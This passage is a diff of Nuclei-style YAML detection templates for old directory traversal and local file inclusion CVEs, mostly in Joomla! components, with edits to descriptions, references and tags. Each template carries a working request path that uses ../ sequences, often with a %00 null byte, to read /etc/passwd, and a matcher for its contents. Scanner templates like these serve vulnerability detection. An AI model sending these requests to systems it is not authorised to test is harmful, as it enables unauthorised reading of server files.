- https://exchange.xforce.ibmcloud.com/vulnerabilities/74321
|
||||
remediation: Apply all relevant security patches and product upgrades.
|
||||
classification:
|
||||
cve-id: CVE-2009-5114
|
||||
tags: cve,cve2009,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wgarcmin.cgi?NEXTPAGE=D&ID=1&DOC=../../../../etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- "root:.*:0:0:"
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# Enhanced by mp on 2022/02/13
|
||||
|
|
|
|||
|
|
@ -4,24 +4,27 @@ info:
|
|||
name: Joomla! Component com_biblestudy - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the Bible Study (com_biblestudy) component 6.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter in a studieslist action to index.php.
|
||||
description: A directory traversal vulnerability in the Bible Study (com_biblestudy) component 6.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter in a studieslist action to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/10943
|
||||
- https://www.cvedetails.com/cve/CVE-2010-0157
|
||||
- http://secunia.com/advisories/37896
|
||||
- http://packetstormsecurity.org/1001-exploits/joomlabiblestudy-lfi.txt
|
||||
remediation: Upgrade to a supported version.
|
||||
classification:
|
||||
cve-id: CVE-2010-0157
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_biblestudy&id=1&view=studieslist&controller=../../../../../../../../etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- "root:.*:0:0:"
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- 200
|
||||
# Enhanced by mp on 2022/02/13
|
||||
|
|
|
|||
|
|
@ -4,29 +4,30 @@ info:
|
|||
name: Joomla! Component CCNewsLetter - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
description: Directory traversal vulnerability in the ccNewsletter (com_ccnewsletter) component 1.0.5 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter in a ccnewsletter action to index.php.
|
||||
reference: |
|
||||
description: A directory traversal vulnerability in the ccNewsletter (com_ccnewsletter) component 1.0.5 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter in a ccnewsletter action to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/11282
|
||||
- https://www.cvedetails.com/cve/CVE-2010-0467
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
- http://web.archive.org/web/20210121194037/https://www.securityfocus.com/bid/37987/
|
||||
- http://www.chillcreations.com/en/blog/ccnewsletter-joomla-newsletter/ccnewsletter-106-security-release.html
|
||||
remediation: Apply all relevant security patches and upgrades.
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N
|
||||
cvss-score: 5.80
|
||||
cvss-score: 5.8
|
||||
cve-id: CVE-2010-0467
|
||||
cwe-id: CWE-22
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_ccnewsletter&controller=../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- "root:.*:0:0:"
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- 200
|
||||
# Enhanced by mp on 2022/02/13
|
||||
|
|
|
|||
|
|
@ -1,27 +1,31 @@
|
|||
id: CVE-2010-0696
|
||||
|
||||
info:
|
||||
name: Joomla! Component Jw_allVideos - Arbitrary File Download
|
||||
name: Joomla! Component Jw_allVideos - Arbitrary File Retrieval
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in includes/download.php in the JoomlaWorks AllVideos (Jw_allVideos) plugin 3.0 through 3.2 for Joomla! allows remote attackers to read arbitrary files via a ./../.../ (modified dot dot) in the file parameter.
|
||||
description: A directory traversal vulnerability in includes/download.php in the JoomlaWorks AllVideos (Jw_allVideos) plugin 3.0 through 3.2 for Joomla! allows remote attackers to read arbitrary files via a ./../.../ (modified dot dot) in the file parameter.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/11447
|
||||
- https://www.cvedetails.com/cve/CVE-2010-0696
|
||||
- http://secunia.com/advisories/38587
|
||||
- http://www.joomlaworks.gr/content/view/77/34/
|
||||
remediation: Upgrade to a supported version.
|
||||
classification:
|
||||
cve-id: CVE-2010-0696
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/plugins/content/jw_allvideos/includes/download.php?file=../../../../../../../../etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- "root:.*:0:0:"
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/02/13
|
||||
|
|
|
|||
|
|
@ -4,24 +4,27 @@ info:
|
|||
name: Joomla! Plugin Core Design Scriptegrator - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php in the Core Design Scriptegrator plugin 1.4.1 for Joomla! allows remote attackers to read, and possibly include and execute, arbitrary files via directory traversal sequences in the files[] parameter.
|
||||
description: A directory traversal vulnerability in plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php in the Core Design Scriptegrator plugin 1.4.1 for Joomla! allows remote attackers to read, and possibly include and execute, arbitrary files via directory traversal sequences in the files[] parameter.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/11498
|
||||
- https://www.cvedetails.com/cve/CVE-2010-0759
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
- http://secunia.com/advisories/38637
|
||||
- http://web.archive.org/web/20210121194344/https://www.securityfocus.com/bid/38296/
|
||||
remediation: Upgrade to a supported version.
|
||||
classification:
|
||||
cve-id: CVE-2010-0759
|
||||
tags: cve,cve2010,joomla,lfi,plugin
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=/etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- "root:.*:0:0:"
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- 200
|
||||
# Enhanced by mp on 2022/02/13
|
||||
|
|
|
|||
|
|
@ -8,20 +8,22 @@ info:
|
|||
reference:
|
||||
- https://www.exploit-db.com/exploits/11089
|
||||
- https://www.cvedetails.com/cve/CVE-2010-0942
|
||||
- http://packetstormsecurity.org/1001-exploits/joomlajvideodirect-traversal.txt
|
||||
remediation: Apply all relevant security patches and product upgrades.
|
||||
classification:
|
||||
cve-id: CVE-2010-0942
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_jvideodirect&controller=../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- "root:.*:0:0:"
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- 200
|
||||
# Enhanced by mp on 2022/02/13
|
||||
|
|
|
|||
|
|
@ -4,24 +4,27 @@ info:
|
|||
name: Joomla! Component com_jashowcase - Directory Traversal
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the JA Showcase (com_jashowcase) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter in a jashowcase action to index.php.
|
||||
description: A directory traversal vulnerability in the JA Showcase (com_jashowcase) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter in a jashowcase action to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/11090
|
||||
- https://www.cvedetails.com/cve/CVE-2010-0943
|
||||
- http://web.archive.org/web/20210121193737/https://www.securityfocus.com/bid/37692/
|
||||
- http://secunia.com/advisories/33486
|
||||
classification:
|
||||
cve-id: CVE-2010-0943
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_jashowcase&view=jashowcase&controller=../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- "root:.*:0:0:"
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/03/30
|
||||
|
|
|
|||
|
|
@ -4,24 +4,27 @@ info:
|
|||
name: Joomla! Component com_jcollection - Directory Traversal
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the JCollection (com_jcollection) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
description: A directory traversal vulnerability in the JCollection (com_jcollection) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/11088
|
||||
- https://www.cvedetails.com/cve/CVE-2010-0944
|
||||
- http://packetstormsecurity.org/1001-exploits/joomlajcollection-traversal.txt
|
||||
- http://www.exploit-db.com/exploits/11088
|
||||
remediation: Apply all relevant security patches and product upgrades.
|
||||
classification:
|
||||
cve-id: CVE-2010-0944
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_jcollection&controller=../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- "root:.*:0:0:"
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# Enhanced by mp on 2022/02/13
|
||||
|
|
|
|||
|
|
@ -4,24 +4,26 @@ info:
|
|||
name: Joomla! Component com_gcalendar Suite 2.1.5 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the GCalendar (com_gcalendar) component 2.1.5 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
|
||||
description: A directory traversal vulnerability in the GCalendar (com_gcalendar) component 2.1.5 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/11738
|
||||
- https://www.cvedetails.com/cve/CVE-2010-0972
|
||||
- http://secunia.com/advisories/38925
|
||||
remediation: Apply all relevant security patches and product upgrades.
|
||||
classification:
|
||||
cve-id: CVE-2010-0972
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_gcalendar&controller=../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- "root:.*:0:0:"
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- 200
|
||||
# Enhanced by mp on 2022/02/13
|
||||
|
|
|
|||
|
|
@ -4,24 +4,27 @@ info:
|
|||
name: Joomla! Component com_cartweberp - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the CARTwebERP (com_cartweberp) component 1.56.75 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
description: A directory traversal vulnerability in the CARTwebERP (com_cartweberp) component 1.56.75 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/10942
|
||||
- https://www.cvedetails.com/cve/CVE-2010-0982
|
||||
- http://web.archive.org/web/20210121193625/https://www.securityfocus.com/bid/37581/
|
||||
- http://secunia.com/advisories/37917
|
||||
remediation: Apply all relevant security patches and product upgrades.
|
||||
classification:
|
||||
cve-id: CVE-2010-0982
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_cartweberp&controller=../../../../../../../../etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- "root:.*:0:0:"
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- 200
|
||||
# Enhanced by mp on 2022/02/13
|
||||
|
|
|
|||
|
|
@ -4,24 +4,27 @@ info:
|
|||
name: Joomla! Component com_abbrev - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the Abbreviations Manager (com_abbrev) component 1.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
|
||||
description: A directory traversal vulnerability in the Abbreviations Manager (com_abbrev) component 1.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/10948
|
||||
- https://www.cvedetails.com/cve/CVE-2010-0985
|
||||
- http://web.archive.org/web/20210623092041/https://www.securityfocus.com/bid/37560
|
||||
- http://www.securityfocus.com/bid/37560
|
||||
remediation: Apply all relevant security patches and product upgrades.
|
||||
classification:
|
||||
cve-id: CVE-2010-0985
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_abbrev&controller=../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- "root:.*:0:0:"
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# Enhanced by mp on 2022/02/13
|
||||
|
|
|
|||
|
|
@ -4,24 +4,27 @@ info:
|
|||
name: Joomla! Component com_rokdownloads - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the RokDownloads (com_rokdownloads) component before 1.0.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
|
||||
description: A directory traversal vulnerability in the RokDownloads (com_rokdownloads) component before 1.0.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/11760
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1056
|
||||
- http://web.archive.org/web/20210121194803/https://www.securityfocus.com/bid/38741/
|
||||
- http://secunia.com/advisories/38982
|
||||
remediation: Apply all relevant security patches and product upgrades.
|
||||
classification:
|
||||
cve-id: CVE-2010-1056
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_rokdownloads&controller=../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- "root:.*:0:0:"
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- 200
|
||||
# Enhanced by mp on 2022/02/13
|
||||
|
|
|
|||
|
|
@ -4,24 +4,27 @@ info:
|
|||
name: Joomla! Component com_communitypolls 1.5.2 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the Community Polls (com_communitypolls) component 1.5.2, and possibly earlier, for Core Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
description: A directory traversal vulnerability in the Community Polls (com_communitypolls) component 1.5.2, and possibly earlier, for Core Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/11511
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1081
|
||||
- http://www.corejoomla.com/component/content/article/1-corejoomla-updates/40-community-polls-v153-security-release.html
|
||||
- http://osvdb.org/62506
|
||||
remediation: Apply all relevant security patches and product upgrades.
|
||||
classification:
|
||||
cve-id: CVE-2010-1081
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_communitypolls&controller=../../../../../../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- "root:.*:0:0:"
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- 200
|
||||
# Enhanced by mp on 2022/02/13
|
||||
|
|
|
|||
|
|
@ -4,24 +4,27 @@ info:
|
|||
name: Joomla! Component & Plugin JE Tooltip 1.0 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the JE Form Creator (com_jeformcr) component for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via directory traversal sequences in the view parameter to index.php. NOTE the original researcher states that the affected product is JE Tooltip, not Form Creator; however, the exploit URL suggests that Form Creator is affected.
|
||||
description: A directory traversal vulnerability in the JE Form Creator (com_jeformcr) component for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via directory traversal sequences in the view parameter to index.php. NOTE -- the original researcher states that the affected product is JE Tooltip, not Form Creator; however, the exploit URL suggests that Form Creator is affected.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/11814
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1217
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
- http://www.packetstormsecurity.org/1003-exploits/joomlajetooltip-lfi.txt
|
||||
- http://web.archive.org/web/20210624111408/https://www.securityfocus.com/bid/38866
|
||||
remediation: Apply all relevant security patches and product upgrades.
|
||||
classification:
|
||||
cve-id: CVE-2010-1217
|
||||
tags: cve,cve2010,joomla,lfi,plugin
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_jeformcr&view=../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- "root:.*:0:0:"
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- 200
|
||||
# Enhanced by mp on 2022/02/13
|
||||
|
|
|
|||
|
|
@ -1,26 +1,30 @@
|
|||
id: CVE-2010-1219
|
||||
|
||||
info:
|
||||
name: Joomla! Component com_janews - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the JA News (com_janews) component 1.0 for Joomla! allows remote attackers to read arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
|
||||
description: A directory traversal vulnerability in the JA News (com_janews) component 1.0 for Joomla! allows remote attackers to read arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/11757
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1219
|
||||
- http://secunia.com/advisories/38952
|
||||
- http://web.archive.org/web/20210617075625/https://www.securityfocus.com/bid/38746
|
||||
remediation: Upgrade to a supported version.
|
||||
classification:
|
||||
cve-id: CVE-2010-1219
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_janews&controller=../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- "root:.*:0:0:"
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# Enhanced by mp on 2022/02/14
|
||||
|
|
|
|||
|
|
@ -4,24 +4,27 @@ info:
|
|||
name: Joomla! Component DW Graph - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in dwgraphs.php in the DecryptWeb DW Graphs (com_dwgraphs) component 1.0 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php.
|
||||
description: A directory traversal vulnerability in dwgraphs.php in the DecryptWeb DW Graphs (com_dwgraphs) component 1.0 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/11978
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1302
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
- http://web.archive.org/web/20210121195144/https://www.securityfocus.com/bid/39108/
|
||||
- http://secunia.com/advisories/39200
|
||||
remediation: Upgrade to a supported version.
|
||||
classification:
|
||||
cve-id: CVE-2010-1302
|
||||
tags: cve,cve2010,joomla,lfi,graph
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_dwgraphs&controller=../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- "root:.*:0:0:"
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- 200
|
||||
# Enhanced by mp on 2022/02/14
|
||||
|
|
|
|||
|
|
@ -4,24 +4,27 @@ info:
|
|||
name: Joomla! Component User Status - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in userstatus.php in the User Status (com_userstatus) component 1.21.16 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
description: A directory traversal vulnerability in userstatus.php in the User Status (com_userstatus) component 1.21.16 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/11998
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1304
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
- http://web.archive.org/web/20210518080735/https://www.securityfocus.com/bid/39174
|
||||
- http://www.securityfocus.com/bid/39174
|
||||
remediation: Upgrade to a supported version.
|
||||
classification:
|
||||
cve-id: CVE-2010-1304
|
||||
tags: cve,cve2010,joomla,lfi,status
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_userstatus&controller=../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- "root:.*:0:0:"
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# Enhanced by mp on 2022/02/14
|
||||
|
|
|
|||
|
|
@ -4,24 +4,27 @@ info:
|
|||
name: Joomla! Component JInventory 1.23.02 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in jinventory.php in the JInventory (com_jinventory) component 1.23.02 and possibly other versions before 1.26.03, a module for Joomla!, allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
description: A directory traversal vulnerability in jinventory.php in the JInventory (com_jinventory) component 1.23.02 and possibly other versions before 1.26.03, a module for Joomla!, allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/12065
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1305
|
||||
- http://extensions.joomla.org/extensions/e-commerce/shopping-cart/7951
|
||||
- http://secunia.com/advisories/39351
|
||||
remediation: Upgrade to a supported version.
|
||||
classification:
|
||||
cve-id: CVE-2010-1305
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_jinventory&controller=../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- "root:.*:0:0:"
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# Enhanced by mp on 2022/02/14
|
||||
|
|
|
|||
|
|
@ -4,24 +4,27 @@ info:
|
|||
name: Joomla! Component Picasa 2.0 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the Picasa (com_joomlapicasa2) component 2.0 and 2.0.5 for Joomla! allows remote attackers to read arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
|
||||
description: A directory traversal vulnerability in the Picasa (com_joomlapicasa2) component 2.0 and 2.0.5 for Joomla! allows remote attackers to read arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/12058
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1306
|
||||
- http://secunia.com/advisories/39338
|
||||
- http://web.archive.org/web/20210121195240/https://www.securityfocus.com/bid/39200/
|
||||
remediation: Upgrade to a supported version.
|
||||
classification:
|
||||
cve-id: CVE-2010-1306
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_joomlapicasa2&controller=../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- "root:.*:0:0:"
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# Enhanced by mp on 2022/02/14
|
||||
|
|
|
|||
|
|
@ -4,24 +4,27 @@ info:
|
|||
name: Joomla! Component Magic Updater - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the Magic Updater (com_joomlaupdater) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
description: A directory traversal vulnerability in the Magic Updater (com_joomlaupdater) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/12070
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1307
|
||||
- http://secunia.com/advisories/39348
|
||||
- http://www.vupen.com/english/advisories/2010/0806
|
||||
remediation: Upgrade to a supported version.
|
||||
classification:
|
||||
cve-id: CVE-2010-1307
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_joomlaupdater&controller=../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- "root:.*:0:0:"
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# Enhanced by mp on 2022/02/14
|
||||
|
|
|
|||
|
|
@ -4,24 +4,26 @@ info:
|
|||
name: Joomla! Component SVMap 1.1.1 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the SVMap (com_svmap) component 1.1.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
description: A directory traversal vulnerability in the SVMap (com_svmap) component 1.1.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/12066
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1308
|
||||
- http://www.vupen.com/english/advisories/2010/0809
|
||||
remediation: Upgrade to a supported version.
|
||||
classification:
|
||||
cve-id: CVE-2010-1308
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_svmap&controller=../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- "root:.*:0:0:"
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# Enhanced by mp on 2022/02/14
|
||||
|
|
|
|||
|
|
@ -4,24 +4,27 @@ info:
|
|||
name: Joomla! Component News Portal 1.5.x - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
